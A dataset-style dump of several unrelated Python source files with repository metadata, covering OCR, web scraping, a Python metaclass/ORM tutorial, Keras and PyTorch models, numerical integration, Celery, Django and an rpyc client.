    ret, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY)
    # Erode with a 3x3 kernel to thin strokes before contour detection.
    img_erode = cv2.erode(thresh, np.ones((3, 3), np.uint8), iterations=1)
    contours, hierarchy = cv2.findContours(img_erode, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    output = img.copy()
    letters = []
    for idx, contour in enumerate(contours):
        (x, y, w, h) = cv2.boundingRect(contour)
        # hierarchy[0][idx][3] is the parent contour index; keep contours
        # whose parent is contour 0 (presumably the page outline -- confirm).
        if hierarchy[0][idx][3] == 0:
            # Drawn only on a copy; the rectangle is for debugging/visuals.
            cv2.rectangle(output, (x, y), (x + w, y + h), (70, 0, 0), 1)
            letter_crop = gray[y:y + h, x:x + w]
            size_max = max(w, h)
            # White square canvas so non-square glyphs keep their aspect.
            letter_square = 255 * np.ones(shape=[size_max, size_max], dtype=np.uint8)
            if w > h:
                y_pos = size_max//2 - h//2
                letter_square[y_pos:y_pos + h, 0:w] = letter_crop
            elif w < h:
                x_pos = size_max//2 - w//2
                letter_square[0:h, x_pos:x_pos + w] = letter_crop
            else:
                letter_square = letter_crop
            letters.append((x, w, cv2.resize(letter_square, (out_size, out_size), interpolation=cv2.INTER_AREA)))
    # Sort by x coordinate: left-to-right reading order.
    letters.sort(key=lambda x: x[0], reverse=False)
    return letters
def emnist_predict_img(model, img):
    """Classify one 28x28 glyph image and return the predicted character."""
    batch = np.expand_dims(img, axis=0)
    batch = 1 - batch / 255.0  # invert + scale intensities into [0, 1]
    # Rotate and mirror the glyph -- presumably to match the orientation the
    # EMNIST model was trained on (confirm against the training pipeline).
    batch[0] = np.rot90(batch[0], 3)
    batch[0] = np.fliplr(batch[0])
    batch = batch.reshape((1, 28, 28, 1))
    scores = model.predict([batch])
    best = np.argmax(scores, axis=1)
    return chr(emnist_labels[best[0]])
def img_to_str(model, image_file: str):
    """OCR ``image_file``: classify every extracted letter, inserting a
    space wherever the gap to the next letter exceeds a quarter of the
    current letter's width."""
    letters = letters_extract(image_file)
    chars = []
    for i, (x, w, crop) in enumerate(letters):
        chars.append(emnist_predict_img(model, crop))
        gap = letters[i + 1][0] - x - w if i < len(letters) - 1 else 0
        if gap > w / 4:
            chars.append(' ')
    return ''.join(chars)
# NOTE(review): hard-coded Windows paths; the model path lacks the r-prefix
# ('\D', '\g' are currently not escape sequences but this is fragile).
image_file = (r'D:\gzip\gzip\3.png')
model = keras.models.load_model('D:\gzip\gzip\Demnist_letters1.h5')
s_out = img_to_str(model, image_file)
print(s_out)
{
"api_name": "cv2.imread",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_RGB2GRAY",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"... |
29326716419 | from bs4 import BeautifulSoup
import requests
from csv import writer
url = "https://www.linkedin.com/jobs/search?keywords=backend&location=India&geoId=102713980&trk=public_jobs_jobs-search-bar_search-submit&position=1&pageNum=0"
page = requests.get(url)
soup = BeautifulSoup(page.content,'html.parser')
lists = soup.find_all('section', class_="two-pane-serp-page__results-list")
with open('scraping.csv', 'w',encoding='utf8',newline="") as f:
thewriter = writer(f)
header = ['info','title','subtitle','titlelink','metadata','location','time']
thewriter.writerow(header)
for list in lists:
titleui = list.find("ul",class_="jobs-search__results-list ")
info = list.find('div',class_="base-search-card__info").text.replace("\n","")
title= list.find('h3',class_="base-search-card__title").text.replace("\n","")
subtitle=list.find('h4', class_="base-search-card__subtitle").text.replace("\n","")
titlelink = list.find('a',class_="hidden-nested-link").text.replace("\n","")
metadata = list.find('div', class_="base-search-card__metadata").text.replace("\n","")
location=list.find('span', class_="job-search-card__location").text.replace("\n","")
time = list.find('span',class_="job-search-card__listdate")
if time is not None:
time = time.text.replace("\n","")
else:
time ="unknown"
main = [info,title,subtitle,titlelink,metadata,location,time]
print(main)
thewriter.writerow(main)
f.flush()
| entrepreneur123/web-scrapping | scrap.py | scrap.py | py | 1,542 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "csv.writer",
"line_number": 14,
"usage_type": "call"
}
] |
4048633000 | import traceback
from types import MethodType
#
# class MyClass(object):
# pass
#
# def set_name(self,name):
# self.name=name
#
# cls = MyClass()
# cls.name="kevin"
# print(cls.name)
#
# cls.set_name = MethodType(set_name,cls)
# cls.set_name("lara")
# print(cls.name)
#第二部分:可以看到上面的类可以被随便添加方法和属性,那么怎么实现只能添加指定的属性和方法?用魔术__slot__
class MyClass2(object):
    """Demonstrates __slots__: only the listed attribute names may be set
    on instances, so arbitrary attributes raise AttributeError."""
    # BUG FIX: set_name assigns self.name, but __slots__ only listed
    # 'name1'/'set_name1', so calling set_name always raised
    # AttributeError.  Keep the original entries and add 'name'.
    # ('set_name' itself must NOT be a slot: it would clash with the
    # method definition below and fail at class creation.)
    __slots__ = ['name1', 'set_name1', 'name']

    def set_name(self, name):
        """Store ``name`` on the instance (allowed by __slots__)."""
        self.name = name
# cls = MyClass2()
# cls.name="kevin"
# print(cls.name)
#
# try:
# cls.set_name = MethodType(set_name,cls) #报错 AttributeError
# except AttributeError:
# traceback.print_exc()
#第三部分,如果继承了第二部分的类,那么slots就不起作用
class ExtMyClass(MyClass2):
    # A subclass without its own __slots__ regains a per-instance __dict__,
    # so the parent's __slots__ restriction no longer applies here.
    pass
# ext_cls = ExtMyClass()
# ext_cls.age=20
#
# print(ext_cls.age)
#第四部分:使用@property实现get 和 set方法
class Student:
    """Score holder demonstrating @property-based validation."""

    @property
    def score(self):
        """The student's score, an int in [0, 100]."""
        return self._score

    @score.setter
    def score(self, value):
        # Validate type first, then range; both reject with ValueError.
        if not isinstance(value, int):
            raise ValueError("not int")
        if value < 0 or value > 100:
            raise ValueError("not between 0 and 100")
        self._score = value

    @property
    def double_socre(self):
        """Read-only: twice the score (no setter is defined)."""
        return self._score * 2
# s = Student()
# s.score=100
# print(s.score) # 100
# print(s.double_socre) # 200
#第五部分:用描述器模拟生成property功能(不想学,下次再说)
#第六部分 类的默认行为与定制
class defaultAction:
    """Shows customizing print()/str() output via __str__."""

    def __init__(self, name):
        self.name = name

    def __str__(self):
        # Same text the original produced by string concatenation.
        return "hello %s" % self.name
# t = defaultAction("bitch") #如果没有__str__重写,就是标准的输出 否则就是自定义的hello bitch
# print(t)
#把类做成迭代器实现 斐波拉契
class Fib100:
    """Iterator yielding Fibonacci numbers not exceeding 100."""

    def __init__(self):
        self._prev, self._curr = 0, 1

    def __iter__(self):
        # The instance is its own iterator.
        return self

    def __next__(self):
        self._prev, self._curr = self._curr, self._curr + self._prev
        if self._prev > 100:
            raise StopIteration
        return self._prev
# for i in Fib100():
# print(i)
# 实现下标访问 需要重写__getitem__选项
class Fib2:
    """Indexable Fibonacci sequence: Fib2()[n] is the n-th number (0-based)."""

    def __getitem__(self, n):
        a, b = 1, 1
        for _ in range(n):
            a, b = b, a + b
        return a
# f = Fib2()
# # print(f[1])
# # print(f[5])
# # print(f[10])
#第七部分 枚举
from enum import Enum
Month = Enum("Month",('Jan','Feb','Mar','Apr'))
# print(Month) #<enum 'Month'>
# print(Month.__members__.items()) ('Jan','Feb','Mar','Apr')
# for name , member in Month.__members__.items():
# print(name,"=>",member,',',member.value)
# print(Month.Jan) # Month.Jan
#第八部分 元类 元编程
def init(self, name):
    """__init__ implementation attached to the dynamically built class."""
    self.name = name

def say_hello(self):
    """Greeting method attached to the dynamically built class."""
    print('Hello! %s!' % self.name)

# type(name, bases, namespace) builds a class at runtime -- equivalent to a
# regular `class Hello(object):` statement with these two methods.
Hello = type('Hello', (object,), {'__init__': init, 'hello': say_hello})
# h = Hello("name")
# h.hello() #Hello! name!
#第九部分 元类(控制类的创建)
class ListMetaClass(type):
    """Metaclass that injects an ``add`` method (an append alias) into
    every class it creates."""

    def __new__(mcs, name, bases, attrs):
        attrs['add'] = lambda self, value: self.append(value)
        return type.__new__(mcs, name, bases, attrs)
#新建一个类指定继承自list,然后指定元类是ListMetaClass, 在上面元类中
#通过__new__新建一个一个add方法,方法体通过lambda方式实现了
class MyList(list, metaclass=ListMetaClass):
    # The metaclass injects add() at class-creation time, so MyList gains
    # an append alias without defining anything here.
    pass
# mli = MyList()
# mli.add(1)
# mli.add(2)
# mli.add(3)
# print(mli)
#第十部分 ORM框架实例实现
#背景:假如我们要自己写model,怎么保证save方法能获取到继承类User的id,name,然后保存呢?
# class User(Model): #都是伪代码
# id = IntegerField('id')
# name = StringField('name')
#
# u = User()
# u.id =100
# u.name = 'tome'
# u.save()
#用元类解决上面的问题
class Field:
    """Base descriptor of an ORM column: a name plus its SQL type."""

    def __init__(self, name, col_type):
        self.name = name
        self.col_type = col_type


class IntegerField(Field):
    """An integer-typed column."""

    def __init__(self, name):
        super().__init__(name, 'integer')


class StringField(Field):
    """A varchar(1024)-typed column."""

    def __init__(self, name):
        super().__init__(name, 'varchar(1024)')


class ModelMetaclass(type):
    """Collects Field class attributes into __mappings__, records the
    class name as __table__, and strips the field attributes from the
    class body."""

    def __new__(mcs, name, bases, attrs):
        if name == 'Model':
            # The abstract base itself gets no mapping.
            return type.__new__(mcs, name, bases, attrs)
        print('Model name: %s' % name)
        mappings = {}
        for attr_name, attr_value in attrs.items():
            if isinstance(attr_value, Field):
                print('Field name: %s' % attr_name)
                mappings[attr_name] = attr_value
        for attr_name in mappings:
            attrs.pop(attr_name)
        attrs['__mappings__'] = mappings
        attrs['__table__'] = name
        return type.__new__(mcs, name, bases, attrs)


class Model(dict, metaclass = ModelMetaclass):
    """dict-backed ORM base: attribute access maps to dict keys and
    save() renders an INSERT statement from __mappings__."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def __getattr__(self, key):
        try:
            return self[key]
        except KeyError:
            raise AttributeError("'Model' object has no attribute '%s'." % key)

    def __setattr__(self, key, value):
        print('__setattr__')
        self[key] = value

    def save(self):
        """Print the INSERT statement and argument list for this row."""
        fields, params, args = [], [], []
        for key, field in self.__mappings__.items():
            fields.append(field.name)
            params.append('?')
            args.append(getattr(self, key, None))
        sql = 'insert into %s(%s) values(%s)' % (self.__table__, ','.join(fields), ','.join(params))
        print('sql:', sql)
        print('args:', args)


class User(Model):
    """Demo model with an integer id and a string name column."""
    id = IntegerField('id')
    name = StringField('name')
# u = User(id = 100, name = 'Tom')
# u = User()
# u.id = 100
# u.name = 'Tom'
# u.save()
#第十一部分:测试
import unittest
class MyDict(dict):
    # Plain dict subclass used as the subject of the unit tests below.
    pass
class TestMyDict(unittest.TestCase):
    """Unit tests for MyDict, demonstrating setUp/tearDown hooks."""

    def setUp(self):
        # Runs before every test method.
        print("测试前")

    def tearDown(self):
        # Runs after every test method.
        print("测试后清理")

    def test_init(self):
        d = MyDict(one=1, two=2)
        self.assertEqual(d['one'], 1)
        self.assertEqual(d['two'], 2)
# if __name__ == '__main__':
# unittest.main()
#第十一部分:日志
import logging

# Write all records (DEBUG and up) to test.log, truncating it each run,
# with a timestamped "name:LEVEL:message" format.
# BUG FIX: datefmt used %M (minute) where the month (%m) was intended,
# producing day-minute-year timestamps.
logging.basicConfig(filename="test.log", filemode="w", format="%(asctime)s %(name)s:%(levelname)s:%(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.DEBUG)

logging.debug('This is a debug message')
logging.info('This is an info message')
logging.warning('This is a warning message')
logging.error('This is an error message')
logging.critical('This is a critical message')
{
"api_name": "enum.Enum",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "unittest.TestCase",
"line_number": 239,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG... |
1306455244 | import argparse
import glob
import os
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from params import logmel_predictions_root, emb_root, saved_models_root
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def main():
    """Run a trained embedding->log-mel generator over saved embedding
    files and store the predicted spectrograms as .npy files."""
    # Arguments parser
    parser = argparse.ArgumentParser(description='Extract Log-mel spectrograms predictions.')
    parser.add_argument('--set_name', type=str, help='Dataset name', default='lj_speech')
    parser.add_argument('--model_name', type=str, help='Model name', default='VGGish')
    parser.add_argument('--loss_type',type=str,help='Loss used for training',default='l1_adv')
    parser.add_argument('--layer', type=str, help='Layer for feature extraction', default='pool1')
    parser.add_argument('--n_songs', type=int, help='Number of songs', default=100)
    parser.add_argument('--override', action='store_true', help='Overwrite existing audio')
    args = parser.parse_args()

    set_name = args.set_name
    model_name = args.model_name
    loss_type = args.loss_type
    layer = args.layer
    n_songs = args.n_songs
    override = args.override

    # Folders
    logmel_predictions_dir = os.path.join(logmel_predictions_root, set_name,model_name + '_' + layer, loss_type)
    emb_dir = os.path.join(emb_root, set_name, model_name + '_' + layer)

    # Output folders
    if not os.path.isdir(logmel_predictions_dir):
        os.makedirs(logmel_predictions_dir)

    # Generate embedding list
    embedding_path_list = glob.glob(os.path.join(emb_dir, '*.npy'))

    # Select number of audio (n_songs <= 0 means "process everything")
    if n_songs > 0:
        embedding_path_list = embedding_path_list[0:n_songs]

    # Load tf model
    logmel_predictions_generator = tf.keras.models.load_model(
        os.path.join(saved_models_root,model_name+'_'+layer,loss_type,))

    # Loop over audio
    for embedding_path in tqdm(embedding_path_list):
        # Output path; skip files already predicted unless --override.
        logmel_id = os.path.basename(embedding_path).split('.')[0]
        logmel_prediction_path = os.path.join(logmel_predictions_dir, '{:s}.npy'.format(logmel_id))
        if not os.path.isfile(logmel_prediction_path) or override:
            try:
                embedding_chunked = np.load(embedding_path)
                logmel_prediction_chunked = logmel_predictions_generator.predict(embedding_chunked)
                # Generate log-mel spectogram prediction using selected model
                if len(logmel_prediction_chunked) != 0:
                    np.save(logmel_prediction_path, logmel_prediction_chunked)
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt;
                # consider `except Exception` instead -- kept as-is here.
                print('Cannot process file {:s}'.format(logmel_id))
if __name__ == '__main__':
    # Lower the process priority slightly (POSIX-only call) before running.
    os.nice(2)
    main()
| polimi-ispl/speech_reconstruction_embeddings | dataset/logmel_predictions.py | logmel_predictions.py | py | 2,750 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentPars... |
27368861795 | import numpy
from sympy import symbols, exp, sqrt, diff, N, solve, integrate
def function(x):
    """Numeric integrand f(x) = exp(-sqrt(x))."""
    root = numpy.sqrt(x)
    return numpy.exp(-root)
def function_symbolic():
    """Symbolic counterpart of ``function``: exp(-sqrt(x)) as a sympy
    expression in the symbol 'x'."""
    x = symbols('x')
    return exp(-sqrt(x))
# noinspection SpellCheckingInspection
def m_n_plus_one(n, a, b, func):
    # Estimate M_{n+1} = max |f^(n+1)| used in quadrature error bounds.
    # Candidates are the endpoints a, b plus the roots of f^(n+2), i.e. the
    # critical points of the (n+1)-th derivative.
    # NOTE(review): the roots returned by solve() are not restricted to
    # [a, b] (and could be complex), so the maximum may be taken over
    # points outside the integration interval -- confirm this is intended.
    x = symbols('x')
    extremums = solve(diff(func, x, n + 2))
    maximum = 0
    maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, a))))
    maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, b))))
    for number in extremums:
        maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, number))))
    return float(maximum)
def define_step(a, b, eps):
    """Pick a uniform step so the trapezoid-rule error bound stays below
    ``eps``, rounding the interval count up to a multiple of 4."""
    m2 = m_n_plus_one(1, a, b, function_symbolic())
    h = numpy.sqrt(12 * eps / (m2 * (b - a)))
    n = numpy.ceil((b - a) / h)
    remainder = n % 4
    if remainder != 0:
        n += 4 - remainder
    return (b - a) / n
def trapezes_integrate(a, b, h):
    """Composite trapezoid rule for ``function`` over [a, b] with step h."""
    n = numpy.ceil((b - a) / h)
    total = 0
    step = 1
    while step <= n:
        left = function(a + (step - 1) * h)
        right = function(a + step * h)
        total += (h / 2) * (left + right)
        step += 1
    return total
def simpson_integrate(a, b, h):
    """Composite Simpson rule for ``function`` over [a, b] with step h."""
    n = numpy.ceil((b - a) / h)
    total = 0
    step = 1
    while step <= n:
        left = function(a + (step - 1) * h)
        midpoint = function(a + (step - 1 / 2) * h)
        right = function(a + step * h)
        total += (h / 6) * (left + 4 * midpoint + right)
        step += 1
    return total
def newton_leibniz_integrate(a, b):
    """Exact symbolic integral of the integrand over [a, b] (reference
    value for the numeric rules above)."""
    x = symbols('x')
    return integrate(function_symbolic(), (x, a, b))
| Miralius/LabsNumericalMethods | Lab3/functions.py | functions.py | py | 1,459 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.exp",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sympy.exp",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sympy.sqrt",
"line_number": 10,
... |
22110756450 | """ Posts Models """
#Django
from users.models import Profile
from django.contrib.auth.models import User
from django.db import models
class Post(models.Model):
    """A photo post published by a user/profile pair."""
    # Both the auth User and the users.Profile are referenced; deleting
    # either cascades and removes the post.
    user=models.ForeignKey(User,on_delete=models.CASCADE)
    profile=models.ForeignKey('users.Profile',on_delete=models.CASCADE)
    title= models.CharField(max_length=255)
    # Uploaded image, stored under MEDIA_ROOT/post/photos.
    photo=models.ImageField(upload_to='post/photos')
    # created is set once on insert; modified refreshes on every save.
    # NOTE(review): DateField stores only the date -- confirm DateTimeField
    # was not intended for per-post timestamps.
    created=models.DateField(auto_now_add=True)
    modified=models.DateField(auto_now=True)

    def __str__(self):
        """Human-readable label, e.g. 'My title by @username'."""
        return '{} by @{}'.format(self.title,self.user.username)
| jjestrada2/jjestrada2.github.io | platziGram/juanjoGraming/posts/models.py | models.py | py | 576 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": ... |
33318878173 | import rpyc
import sys
server = "localhost"
if len(sys.argv) > 1:
if int(sys.argv[1]) > 0:
try:
conn = rpyc.connect(server, 18811)
if conn.root:
conn.root.initialize_connections(int(sys.argv[1]))
while True:
try:
remote_command = input("Input the Command:\t").lower().split(" ")
conn.root.handle_remote_command(remote_command)
if remote_command[0] == "exit":
sys.exit(0)
except KeyboardInterrupt:
print("\nKeyboardInterrupt detected. Disconnecting from server.")
conn.close()
break
except EOFError:
print("Connection Terminated.")
finally:
print("Exiting.")
else:
print("No of connections cannot be less than 1.")
sys.exit(0)
else:
print("Usage: 'driver_service.py <number_of_connections>'")
sys.exit(0) | bodias/ds2022-mini-proj-1 | ra_program_client.py | ra_program_client.py | py | 793 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rpyc.connect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 1... |
6884041126 | from torch import nn
import torch.nn.functional as f
class LSTM(nn.Module):
    """Sequence classifier: linear projection -> stacked LSTM -> linear head.

    Args:
        in_channels: number of input features per time step.
        hidden_dim: size of the LSTM hidden state.
        n_layer: number of stacked LSTM layers.
        n_classes: number of output classes.
    """

    def __init__(self, in_channels, hidden_dim, n_layer, n_classes):
        super(LSTM, self).__init__()
        self.n_layer = n_layer
        # Fixed bottleneck dimension for the input projection.
        self.latent_dim = 32
        self.hidden_dim = hidden_dim
        self.map = nn.Linear(in_channels, self.latent_dim)
        self.lstm = nn.LSTM(self.latent_dim, hidden_dim, n_layer, batch_first=True)
        self.fc = nn.Linear(hidden_dim, n_classes)

    def forward(self, x):
        # x: (batch, seq_len, in_channels) — assumed; TODO confirm with callers.
        x = self.map(x)
        out, (h_n, c_n) = self.lstm(x)
        # Summarise the sequence with the last layer's final hidden state.
        x = h_n[-1, :, :]
        y = self.fc(x)
        # Fix: softmax without an explicit `dim` is deprecated and emits a
        # warning; dim=1 is the class dimension of the (batch, n_classes)
        # logits and matches the previous implicit behaviour.
        y = f.softmax(y, dim=1)
        return y
| Huasheng-hou/deep-fin | src/model/LSTM.py | LSTM.py | py | 657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
2333300703 | from openpyxl import Workbook
# Build a two-sheet workbook: "Relatorios" (expenses) and "Ganhos" (income).
arquivo_excel = Workbook()
# The freshly created workbook always has one active sheet; rename it.
planilha1 = arquivo_excel.active
planilha1.title = "Relatorios"
planilha2 = arquivo_excel.create_sheet("Ganhos")
# Header row plus one sample expense entry (category / value).
planilha1['A1'] = 'Categoria'
planilha1['B1'] = 'Valor'
planilha1['A2'] = "Restaurante"
planilha1['B2'] = 45.99
# cell(row=..., column=...) uses 1-based indices.
planilha2.cell(row=3, column=1, value=2000)
planilha2.cell(row=1, column=1, value="VALOR")
arquivo_excel.save("relatorio.xlsx") | DeMouraSS/dados-detran | planilha.py | planilha.py | py | 409 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "openpyxl.Workbook",
"line_number": 2,
"usage_type": "call"
}
] |
25474598848 |
"""
Picomon executable module.
This module can be executed from a command line with ``$python -m picomon`` or
from a python programme with ``picomon.__main__.run()``.
"""
import concurrent.futures
import signal
import argparse
import logging
import traceback
import sys
import os
from time import sleep
from datetime import datetime, timedelta
from . import config
from . import mails
def __create_report(only_old=False):
    """Build a plain-text status report over all configured checks.

    When *only_old* is True, only failures older than the configured
    report interval count as errors.  Returns (report, has_error).
    """
    now = datetime.now()
    min_age = timedelta(seconds=config.emails.report.every)

    # Collect the checks that qualify as "in error" for this report.
    failing = []
    for check in config.checks:
        if check.ok:
            continue
        if only_old and now - check.failure_date <= min_age:
            continue
        failing.append(check)

    separator = '-+' * 40
    parts = ["\n Checks in error:\n"]
    for check in failing:
        parts.append(separator + '\n')
        parts.append("%s: %s\nSince %s\n\t%s\n" % (check.target_name, check,
                     check.failure_date, check.errmsg.strip()))
        parts.append(separator + "\n\n")

    parts.append(" Other checks (usually OK but may be in retry mode):\n")
    for check in config.checks:
        if check.ok:
            parts.append("Check %s is %s\n" % (check,
                         "OK" if check.retry_count == 0 else "retrying"))

    return (''.join(parts), bool(failing))
def __usr1_handler(signum, frame):
    # SIGUSR1 handler: dump the current state of all checks to stdout.
    (report, err) = __create_report()
    print ("Signal SIGUSR1 caught, printing state of checks. (%s)" %
           datetime.now())
    print (report)
    # Flush so the report is visible immediately even when stdout is piped.
    sys.stdout.flush()
def __alarm_handler(signum, frame):
    # SIGALRM handler (fires every config.emails.report.every seconds):
    # email a report covering only failures older than that interval.
    (report, err) = __create_report(only_old=True)
    if err:
        report = "Following entries have failed for more than %ss:\n" % \
            config.emails.report.every + report
        mails.send_email_report(report)
def parse_args():
    """Parse the daemon's command-line options and return the namespace."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-1", "--one", action="store_true",
        help="single run with immediate output of " +
             "check results (test/debug)")
    parser.add_argument(
        "-D", "--debug", action="store_true",
        help="Set verbosity to DEBUG")
    parser.add_argument(
        "-c", "--config", default='config.py',
        help="Set config file (defauts to config.py)")
    return parser.parse_args()
def import_config(configfile):
    """Import *configfile* as a Python module; exit the program on failure.

    Bytecode writing is disabled and the file's directory is appended to
    sys.path so config files in read-only directories keep working.
    """
    # importlib is only needed here, so import it locally.
    from importlib import import_module
    sys.dont_write_bytecode = True
    directory, filename = os.path.split(configfile)
    sys.path.append(directory)
    module_name = os.path.splitext(filename)[0]
    try:
        import_module(module_name)
    except ImportError as e:
        logging.critical("Cannot load config from '%s': %s" % (
            configfile, str(e)))
        sys.exit(1)
def run():
    """Entry point: load config, install signal handlers and poll all checks."""
    # Parse command line
    args = parse_args()
    # import config file module
    import_config(args.config)
    # Configure logging
    logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
                        level=config.verb_level)
    if args.debug:
        logging.getLogger().setLevel('DEBUG')
    # register signal handling: SIGUSR1 dumps state, SIGALRM mails reports
    signal.signal(signal.SIGUSR1, __usr1_handler)
    signal.signal(signal.SIGALRM, __alarm_handler)
    # register report signal interval (0 disables periodic reports)
    if config.emails.report.every > 0:
        signal.setitimer(signal.ITIMER_REAL, config.emails.report.every,
                         config.emails.report.every)
    # do the actual polling
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        if args.one:
            # Single-shot mode: run every check once and print its outcome.
            def runner(check):
                return check.run(immediate=True), check
            futures = []
            for check in config.checks:
                futures.append(executor.submit(runner, check))
            for future in concurrent.futures.as_completed(futures):
                success, check = future.result()
                if success:
                    print("Check %s successful!" % (str(check)))
                else:
                    print("Check %s failed:\n%s" %
                          (str(check), check.errmsg.strip()))
        else:
            # Since we never reclaim finished tasks, exceptions raised during
            # run are never seen. Using a runner we can at least display them.
            def runner(check):
                try:
                    return check.run()
                except Exception as e:
                    traceback.print_exc()
                    raise e
            # This will drift slowly as it takes (base_tick + espilon) seconds
            while True:
                for check in config.checks:
                    executor.submit(runner, check)
                sleep(config.base_tick)
    mails.quit()
if __name__ == '__main__':
run()
| StrasWeb/picomon | picomon/__main__.py | __main__.py | py | 4,947 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "datetime.timedelta",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.d... |
2774942212 | from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "applifting.settings")
app = Celery("applifting")
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object("django.conf:settings")
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
@app.on_after_finalize.connect
def setup_periodic_tasks(sender, **kwargs):
    # Once the Celery app is fully configured, schedule the price snapshot
    # task to run every 60 seconds.
    sender.add_periodic_task(
        60.0,
        snapshot_offer_pricestamps.s(),
        name="get_offer_pricestamps_for_all_products",
    )
@app.task(bind=True)
def debug_task(self):
    # Diagnostic task: print the task's request context to verify that the
    # worker is wired up correctly.
    print(f"Request: {self.request!r}")
@app.task
def snapshot_offer_pricestamps():
    # Imported lazily to avoid a circular import between this Celery app
    # module and the Django app's task module at startup.
    from catalog.tasks import get_offer_pricestamps_for_all_products

    return get_offer_pricestamps_for_all_products()
| ondrej-ivanko/applifting | applifting/celery.py | celery.py | py | 949 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ.setdefault",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "celery.Celery",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.conf.settings... |
41654548036 | import numpy as np
import keras
import pandas as pd
from sklearn.model_selection import train_test_split
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras.datasets import mnist
# --- Data preparation: Kaggle MNIST train.csv (label + 784 pixel columns) ---
batch_size = 128
df = pd.read_csv("train.csv")
y = df.label.values
X = df.drop("label", axis=1).values
# Hold out 20% of the training data for validation.
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.2)
X_train = np.array(X_train)
Y_train = np.array(Y_train)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
# Reshape flat 784-pixel rows to (n, 28, 28, 1) images and scale to [0, 1].
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')
X_train /= 255
X_test /= 255
# One-hot encode the 10 digit classes.
Y_train = np_utils.to_categorical(Y_train, 10)
Y_test = np_utils.to_categorical(Y_test, 10)
# --- Model: two conv layers -> max-pool -> dropout -> dense classifier ---
model = Sequential()
model.add(Convolution2D(32, (6, 6), activation="relu", input_shape=(28, 28, 1)))
model.add(Convolution2D(64, (6, 6), activation="relu"))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(10, activation="softmax"))
model.compile(loss="categorical_crossentropy",
              optimizer="adam",
              metrics=['accuracy'])
model.fit(X_train, Y_train, batch_size=batch_size, epochs=5, verbose=1, validation_data=(X_test, Y_test))
model.save('model_new.h5')
# Evaluate on the held-out split.
score = model.evaluate(X_test, Y_test, verbose=0)
print("Test loss: {} ".format(score[0]))
print("Test accuracy: {}".format(score[1]))
test_data = pd.read_csv("test.csv")
# NOTE(review): mid-file import; conventionally this belongs at the top.
import matplotlib.pyplot as plt
# Predict a digit class for every row of the test set.
